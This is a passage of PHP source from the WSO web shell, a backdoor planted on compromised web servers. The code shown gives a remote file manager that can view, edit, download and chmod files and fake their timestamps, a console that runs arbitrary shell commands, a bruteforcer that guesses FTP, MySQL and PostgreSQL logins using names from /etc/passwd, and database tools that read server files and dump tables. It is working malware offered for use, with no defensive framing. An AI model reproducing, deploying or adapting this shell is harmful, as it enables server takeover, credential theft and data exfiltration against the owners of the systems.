689 );
690 if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array(
691 'type' => 'file'
692 ));
693 elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array(
694 'type' => 'link',
695 'link' => readlink($tmp['path'])
696 ));
697 elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(
698 'type' => 'dir'
699 ));
700 }
701
702 $GLOBALS['sort'] = $sort;
703 function wsoCmp($a, $b)
704 {
705 if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]) , strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
706 else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
707 }
708
709 usort($files, "wsoCmp");
710 usort($dirs, "wsoCmp");
711 $files = array_merge($dirs, $files);
712 $l = 0;
713 foreach($files as $f)
714 {
715 echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . (($f['type'] == 'file') ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . (($f['type'] == 'file') ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
716 $l = $l ? 0 : 1;
717 }
718
719 echo "<tr><td colspan=7> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'> <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
720 if (class_exists('ZipArchive')) echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
721 echo "<option value='tar'>Compress (tar.gz)</option>";
722 if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>Paste / Compress</option>";
723 echo "</select> ";
724 if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> ";
725 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
726 wsoFooter();
727 }
728
729function actionStringTools()
730 {
731 if (!function_exists('hex2bin'))
732 {
733 function hex2bin($p)
734 {
735 return decbin(hexdec($p));
736 }
737 }
738
739 if (!function_exists('binhex'))
740 {
741 function binhex($p)
742 {
743 return dechex(bindec($p));
744 }
745 }
746
747 if (!function_exists('hex2ascii'))
748 {
749 function hex2ascii($p)
750 {
751 $r = '';
752 for ($i = 0; $i < strLen($p); $i+= 2)
753 {
754 $r.= chr(hexdec($p[$i] . $p[$i + 1]));
755 }
756
757 return $r;
758 }
759 }
760
761 if (!function_exists('ascii2hex'))
762 {
763 function ascii2hex($p)
764 {
765 $r = '';
766 for ($i = 0; $i < strlen($p); ++$i) $r.= sprintf('%02X', ord($p[$i]));
767 return strtoupper($r);
768 }
769 }
770
771 if (!function_exists('full_urlencode'))
772 {
773 function full_urlencode($p)
774 {
775 $r = '';
776 for ($i = 0; $i < strlen($p); ++$i) $r.= '%' . dechex(ord($p[$i]));
777 return strtoupper($r);
778 }
779 }
780
781 $stringTools = array(
782 'Base64 encode' => 'base64_encode',
783 'Base64 decode' => 'base64_decode',
784 'Url encode' => 'urlencode',
785 'Url decode' => 'urldecode',
786 'Full urlencode' => 'full_urlencode',
787 'md5 hash' => 'md5',
788 'sha1 hash' => 'sha1',
789 'crypt' => 'crypt',
790 'CRC32' => 'crc32',
791 'ASCII to HEX' => 'ascii2hex',
792 'HEX to ASCII' => 'hex2ascii',
793 'HEX to DEC' => 'hexdec',
794 'HEX to BIN' => 'hex2bin',
795 'DEC to HEX' => 'dechex',
796 'DEC to BIN' => 'decbin',
797 'BIN to HEX' => 'binhex',
798 'BIN to DEC' => 'bindec',
799 'String to lower case' => 'strtolower',
800 'String to upper case' => 'strtoupper',
801 'Htmlspecialchars' => 'htmlspecialchars',
802 'String length' => 'strlen',
803 );
804 if (isset($_POST['ajax']))
805 {
806 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
807 ob_start();
808 if (in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']);
809 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()) , "\n\r\t\\'\0") . "';\n";
810 echo strlen($temp) , "\n", $temp;
811 exit;
812 }
813
814 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
815 wsoHeader();
816 echo '<h1>String conversions</h1><div class=content>';
817 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
818 foreach($stringTools as $k => $v) echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
819 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br /><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
820 if (!empty($_POST['p1']))
821 {
822 if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
823 }
824
825 echo "</pre></div><br /><h1>Search files:</h1><div class=content> <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> <tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr> <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> <tr><td></td><td><input type='submit' value='>>'></td></tr> </table></form>";
826 function wsoRecursiveGlob($path)
827 {
828 if (substr($path, -1) != '/') $path.= '/';
829 $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']) , @glob($path . '*', GLOB_ONLYDIR)));
830 if (is_array($paths) && @count($paths))
831 {
832 foreach($paths as $item)
833 {
834 if (@is_dir($item))
835 {
836 if ($path != $item) wsoRecursiveGlob($item);
837 }
838 else
839 {
840 if (empty($_POST['p2']) || @strpos(file_get_contents($item) , $_POST['p2']) !== false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br />";
841 }
842 }
843 }
844 }
845
846 if (@$_POST['p3']) wsoRecursiveGlob($_POST['c']);
847 echo "</div><br /><h1>Search for hash:</h1><div class=content> <form method='post' target='_blank' name='hf'> <input type='text' name='hash' style='width:200px;'><br /> <input type='hidden' name='act' value='find'/> <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br /> <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br /> <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br /> </form></div>";
848 wsoFooter();
849 }
850
851function actionFilesTools()
852 {
853 if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']);
854 if (@$_POST['p2'] == 'download')
855 {
856 if (@is_file($_POST['p1']) && @is_readable($_POST['p1']))
857 {
858 ob_start("ob_gzhandler", 4096);
859 header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
860 if (function_exists("mime_content_type"))
861 {
862 $type = @mime_content_type($_POST['p1']);
863 header("Content-Type: " . $type);
864 }
865 else header("Content-Type: application/octet-stream");
866 $fp = @fopen($_POST['p1'], "r");
867 if ($fp)
868 {
869 while (!@feof($fp)) echo @fread($fp, 1024);
870 fclose($fp);
871 }
872 }
873
874 exit;
875 }
876
877 if (@$_POST['p2'] == 'mkfile')
878 {
879 if (!file_exists($_POST['p1']))
880 {
881 $fp = @fopen($_POST['p1'], 'w');
882 if ($fp)
883 {
884 $_POST['p2'] = "edit";
885 fclose($fp);
886 }
887 }
888 }
889
890 wsoHeader();
891 echo '<h1>File tools</h1><div class=content>';
892 if (!file_exists(@$_POST['p1']))
893 {
894 echo 'File not exists';
895 wsoFooter();
896 return;
897 }
898
899 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
900 if (!$uid)
901 {
902 $uid['name'] = @fileowner($_POST['p1']);
903 $gid['name'] = @filegroup($_POST['p1']);
904 }
905 else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
906 echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br />';
907 echo '<span>Create time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br /><br />';
908 if (empty($_POST['p2'])) $_POST['p2'] = 'view';
909 if (is_file($_POST['p1'])) $m = array(
910 'View',
911 'Highlight',
912 'Download',
913 'Hexdump',
914 'Edit',
915 'Chmod',
916 'Rename',
917 'Touch'
918 );
919 else $m = array(
920 'Chmod',
921 'Rename',
922 'Touch'
923 );
924 foreach($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . ((strtolower($v) == @$_POST['p2']) ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
925 echo '<br /><br />';
926 switch ($_POST['p2'])
927 {
928 case 'view':
929 echo '<pre class=ml1>';
930 $fp = @fopen($_POST['p1'], 'r');
931 if ($fp)
932 {
933 while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
934 @fclose($fp);
935 }
936
937 echo '</pre>';
938 break;
939
940 case 'highlight':
941 if (@is_readable($_POST['p1']))
942 {
943 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
944 $code = @highlight_file($_POST['p1'], true);
945 echo str_replace(array(
946 '<span ',
947 '</span>'
948 ) , array(
949 '<font ',
950 '</font>'
951 ) , $code) . '</div>';
952 }
953
954 break;
955
956 case 'chmod':
957 if (!empty($_POST['p3']))
958 {
959 $perms = 0;
960 for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i) $perms+= (int)$_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
961 if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br /><script>document.mf.p3.value="";</script>';
962 }
963
964 clearstatcache();
965 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])) , -4) . '"><input type=submit value=">>"></form>';
966 break;
967
968 case 'edit':
969 if (!is_writable($_POST['p1']))
970 {
971 echo 'File isn\'t writeable';
972 break;
973 }
974
975 if (!empty($_POST['p3']))
976 {
977 $time = @filemtime($_POST['p1']);
978 $_POST['p3'] = substr($_POST['p3'], 1);
979 $fp = @fopen($_POST['p1'], "w");
980 if ($fp)
981 {
982 @fwrite($fp, $_POST['p3']);
983 @fclose($fp);
984 echo 'Saved!<br /><script>p3_="";</script>';
985 @touch($_POST['p1'], $time, $time);
986 }
987 }
988
989 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
990 $fp = @fopen($_POST['p1'], 'r');
991 if ($fp)
992 {
993 while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
994 @fclose($fp);
995 }
996
997 echo '</textarea><input type=submit value=">>"></form>';
998 break;
999
1000 case 'hexdump':
1001 $c = @file_get_contents($_POST['p1']);
1002 $n = 0;
1003 $h = array(
1004 '00000000<br />',
1005 '',
1006 ''
1007 );
1008 $len = strlen($c);
1009 for ($i = 0; $i < $len; ++$i)
1010 {
1011 $h[1].= sprintf('%02X', ord($c[$i])) . ' ';
1012 switch (ord($c[$i]))
1013 {
1014 case 0:
1015 $h[2].= ' ';
1016 break;
1017
1018 case 9:
1019 $h[2].= ' ';
1020 break;
1021
1022 case 10:
1023 $h[2].= ' ';
1024 break;
1025
1026 case 13:
1027 $h[2].= ' ';
1028 break;
1029
1030 default:
1031 $h[2].= $c[$i];
1032 break;
1033 }
1034
1035 $n++;
1036 if ($n == 32)
1037 {
1038 $n = 0;
1039 if ($i + 1 < $len)
1040 {
1041 $h[0].= sprintf('%08X', $i + 1) . '<br />';
1042 }
1043
1044 $h[1].= '<br />';
1045 $h[2].= "\n";
1046 }
1047 }
1048
1049 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
1050 break;
1051
1052 case 'rename':
1053 if (!empty($_POST['p3']))
1054 {
1055 if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br />';
1056 else die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
1057 }
1058
1059 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
1060 break;
1061
1062 case 'touch':
1063 if (!empty($_POST['p3']))
1064 {
1065 $time = strtotime($_POST['p3']);
1066 if ($time)
1067 {
1068 if (!touch($_POST['p1'], $time, $time)) echo 'Fail!';
1069 else echo 'Touched!';
1070 }
1071 else echo 'Bad time format!';
1072 }
1073
1074 clearstatcache();
1075 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
1076 break;
1077 }
1078
1079 echo '</div>';
1080 wsoFooter();
1081 }
1082
1083function actionConsole()
1084 {
1085 if (!empty($_POST['p1']) && !empty($_POST['p2']))
1086 {
1087 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
1088 $_POST['p1'].= ' 2>&1';
1089 }
1090 elseif (!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
1091 if (isset($_POST['ajax']))
1092 {
1093 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
1094 ob_start();
1095 echo "d.cf.cmd.value='';\n";
1096 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']) , "\n\r\t\\'\0"));
1097 if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match))
1098 {
1099 if (@chdir($match[1]))
1100 {
1101 $GLOBALS['cwd'] = @getcwd();
1102 echo "c_='" . $GLOBALS['cwd'] . "';";
1103 }
1104 }
1105
1106 echo "d.cf.output.value+='" . $temp . "';";
1107 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
1108 $temp = ob_get_clean();
1109 echo strlen($temp) , "\n", $temp;
1110 exit;
1111 }
1112
1113 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
1114 wsoHeader();
1115 echo "<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } </script>";
1116 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
1117 foreach($GLOBALS['aliases'] as $n => $v)
1118 {
1119 if ($v == '')
1120 {
1121 echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
1122 continue;
1123 }
1124
1125 echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
1126 }
1127
1128 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
1129 if (!empty($_POST['p1']))
1130 {
1131 echo htmlspecialchars("$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']));
1132 }
1133
1134 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1135 echo '</form></div><script>d.cf.cmd.focus();</script>';
1136 wsoFooter();
1137 }
1138
1139function actionLogout()
1140 {
1141 setcookie(md5($_SERVER['HTTP_HOST']) , '', time() - 3600);
1142 die('bye!');
1143 }
1144
1145function actionSelfRemove()
1146 {
1147 if ($_POST['p1'] == 'yes')
1148 if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed');
1149 else echo 'unlink error!';
1150 if ($_POST['p1'] != 'yes') wsoHeader();
1151 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br /><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1152 wsoFooter();
1153 }
1154
1155function actionBruteforce()
1156 {
1157 wsoHeader();
1158 if (isset($_POST['proto']))
1159 {
1160 echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br />';
1161 if ($_POST['proto'] == 'ftp')
1162 {
1163 function wsoBruteForce($ip, $port, $login, $pass)
1164 {
1165 $fp = @ftp_connect($ip, $port ? $port : 21);
1166 if (!$fp) return false;
1167 $res = @ftp_login($fp, $login, $pass);
1168 @ftp_close($fp);
1169 return $res;
1170 }
1171 }
1172 elseif ($_POST['proto'] == 'mysql')
1173 {
1174 function wsoBruteForce($ip, $port, $login, $pass)
1175 {
1176 $res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
1177 @mysql_close($res);
1178 return $res;
1179 }
1180 }
1181 elseif ($_POST['proto'] == 'pgsql')
1182 {
1183 function wsoBruteForce($ip, $port, $login, $pass)
1184 {
1185 $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
1186 $res = @pg_connect($str);
1187 @pg_close($res);
1188 return $res;
1189 }
1190 }
1191
1192 $success = 0;
1193 $attempts = 0;
1194 $server = explode(":", $_POST['server']);
1195 if ($_POST['type'] == 1)
1196 {
1197 $temp = @file('/etc/passwd');
1198 if (is_array($temp))
1199 foreach($temp as $line)
1200 {
1201 $line = explode(":", $line);
1202 ++$attempts;
1203 if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0]))
1204 {
1205 $success++;
1206 echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br />';
1207 }
1208
1209 if (@$_POST['reverse'])
1210 {
1211 $tmp = "";
1212 for ($i = strlen($line[0]) - 1; $i >= 0; --$i) $tmp.= $line[0][$i];
1213 ++$attempts;
1214 if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp))
1215 {
1216 $success++;
1217 echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
1218 }
1219 }
1220 }
1221 }
1222 elseif ($_POST['type'] == 2)
1223 {
1224 $temp = @file($_POST['dict']);
1225 if (is_array($temp))
1226 foreach($temp as $line)
1227 {
1228 $line = trim($line);
1229 ++$attempts;
1230 if (wsoBruteForce($server[0], @$server[1], $_POST['login'], $line))
1231 {
1232 $success++;
1233 echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br />';
1234 }
1235 }
1236 }
1237
1238 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br />";
1239 }
1240
1241 echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1242 echo '</div><br />';
1243 wsoFooter();
1244 }
1245
1246function actionSql()
1247 {
1248 class DbClass
1249
1250 {
1251 var $type;
1252 var $link;
1253 var $res;
1254 function DbClass($type)
1255 {
1256 $this->type = $type;
1257 }
1258
1259 function connect($host, $user, $pass, $dbname)
1260 {
1261 switch ($this->type)
1262 {
1263 case 'mysql':
1264 if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
1265 break;
1266
1267 case 'pgsql':
1268 $host = explode(':', $host);
1269 if (!$host[1]) $host[1] = 5432;
1270 if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
1271 break;
1272 }
1273
1274 return false;
1275 }
1276
1277 function selectdb($db)
1278 {
1279 switch ($this->type)
1280 {
1281 case 'mysql':
1282 if (@mysql_select_db($db)) return true;
1283 break;
1284 }
1285
1286 return false;
1287 }
1288
1289 function query($str)
1290 {
1291 switch ($this->type)
1292 {
1293 case 'mysql':
1294 return $this->res = @mysql_query($str);
1295 break;
1296
1297 case 'pgsql':
1298 return $this->res = @pg_query($this->link, $str);
1299 break;
1300 }
1301
1302 return false;
1303 }
1304
1305 function fetch()
1306 {
1307 $res = func_num_args() ? func_get_arg(0) : $this->res;
1308 switch ($this->type)
1309 {
1310 case 'mysql':
1311 return @mysql_fetch_assoc($res);
1312 break;
1313
1314 case 'pgsql':
1315 return @pg_fetch_assoc($res);
1316 break;
1317 }
1318
1319 return false;
1320 }
1321
1322 function listDbs()
1323 {
1324 switch ($this->type)
1325 {
1326 case 'mysql':
1327 return $this->query("SHOW databases");
1328 break;
1329
1330 case 'pgsql':
1331 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1332 break;
1333 }
1334
1335 return false;
1336 }
1337
1338 function listTables()
1339 {
1340 switch ($this->type)
1341 {
1342 case 'mysql':
1343 return $this->res = $this->query('SHOW TABLES');
1344 break;
1345
1346 case 'pgsql':
1347 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1348 break;
1349 }
1350
1351 return false;
1352 }
1353
1354 function error()
1355 {
1356 switch ($this->type)
1357 {
1358 case 'mysql':
1359 return @mysql_error();
1360 break;
1361
1362 case 'pgsql':
1363 return @pg_last_error();
1364 break;
1365 }
1366
1367 return false;
1368 }
1369
1370 function setCharset($str)
1371 {
1372 switch ($this->type)
1373 {
1374 case 'mysql':
1375 if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
1376 else $this->query('SET CHARSET ' . $str);
1377 break;
1378
1379 case 'pgsql':
1380 return @pg_set_client_encoding($this->link, $str);
1381 break;
1382 }
1383
1384 return false;
1385 }
1386
1387 function loadFile($str)
1388 {
1389 switch ($this->type)
1390 {
1391 case 'mysql':
1392 return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
1393 break;
1394
1395 case 'pgsql':
1396 $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;");
1397 $r = array();
1398 while ($i = $this->fetch()) $r[] = $i['file'];
1399 $this->query('drop table wso2');
1400 return array(
1401 'file' => implode("\n", $r)
1402 );
1403 break;
1404 }
1405
1406 return false;
1407 }
1408
1409 function dump($table, $fp = false)
1410 {
1411 switch ($this->type)
1412 {
1413 case 'mysql':
1414 $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
1415 $create = mysql_fetch_array($res);
1416 $sql = $create[1] . ";\n";
1417 if ($fp) fwrite($fp, $sql);
1418 else echo ($sql);
1419 $this->query('SELECT * FROM `' . $table . '`');
1420 $i = 0;
1421 $head = true;
1422 while ($item = $this->fetch())
1423 {
1424 $sql = '';
1425 if ($i % 1000 == 0)
1426 {
1427 $head = true;
1428 $sql = ";\n\n";
1429 }
1430
1431 $columns = array();
1432 foreach($item as $k => $v)
1433 {
1434 if ($v === null) $item[$k] = "NULL";
1435 elseif (is_int($v)) $item[$k] = $v;
1436 else $item[$k] = "'" . @mysql_real_escape_string($v) . "'";
1437 $columns[] = "`" . $k . "`";
1438 }
1439
1440 if ($head)
1441 {
1442 $sql.= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
1443 $head = false;
1444 }
1445 else $sql.= "\n\t,(" . implode(", ", $item) . ')';
1446 if ($fp) fwrite($fp, $sql);
1447 else echo ($sql);
1448 $i++;
1449 }
1450
1451 if (!$head)
1452 if ($fp) fwrite($fp, ";\n\n");
1453 else echo (";\n\n");
1454 break;
1455
1456 case 'pgsql':
1457 $this->query('SELECT * FROM ' . $table);
1458 while ($item = $this->fetch())
1459 {
1460 $columns = array();
1461 foreach($item as $k => $v)
1462 {
1463 $item[$k] = "'" . addslashes($v) . "'";
1464 $columns[] = $k;
1465 }
1466
1467 $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
1468 if ($fp) fwrite($fp, $sql);
1469 else echo ($sql);
1470 }
1471
1472 break;
1473 }
1474
1475 return false;
1476 }
1477 };
1478 $db = new DbClass($_POST['type']);
1479 if (@$_POST['p2'] == 'download')
1480 {
1481 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1482 $db->selectdb($_POST['sql_base']);
1483 switch ($_POST['charset'])
1484 {
1485 case "Windows-1251":
1486 $db->setCharset('cp1251');
1487 break;
1488
1489 case "UTF-8":
1490 $db->setCharset('utf8');
1491 break;
1492
1493 case "KOI8-R":
1494 $db->setCharset('koi8r');
1495 break;
1496
1497 case "KOI8-U":
1498 $db->setCharset('koi8u');
1499 break;
1500
1501 case "cp866":
1502 $db->setCharset('cp866');
1503 break;
1504 }
1505
1506 if (empty($_POST['file']))
1507 {
1508 ob_start("ob_gzhandler", 4096);
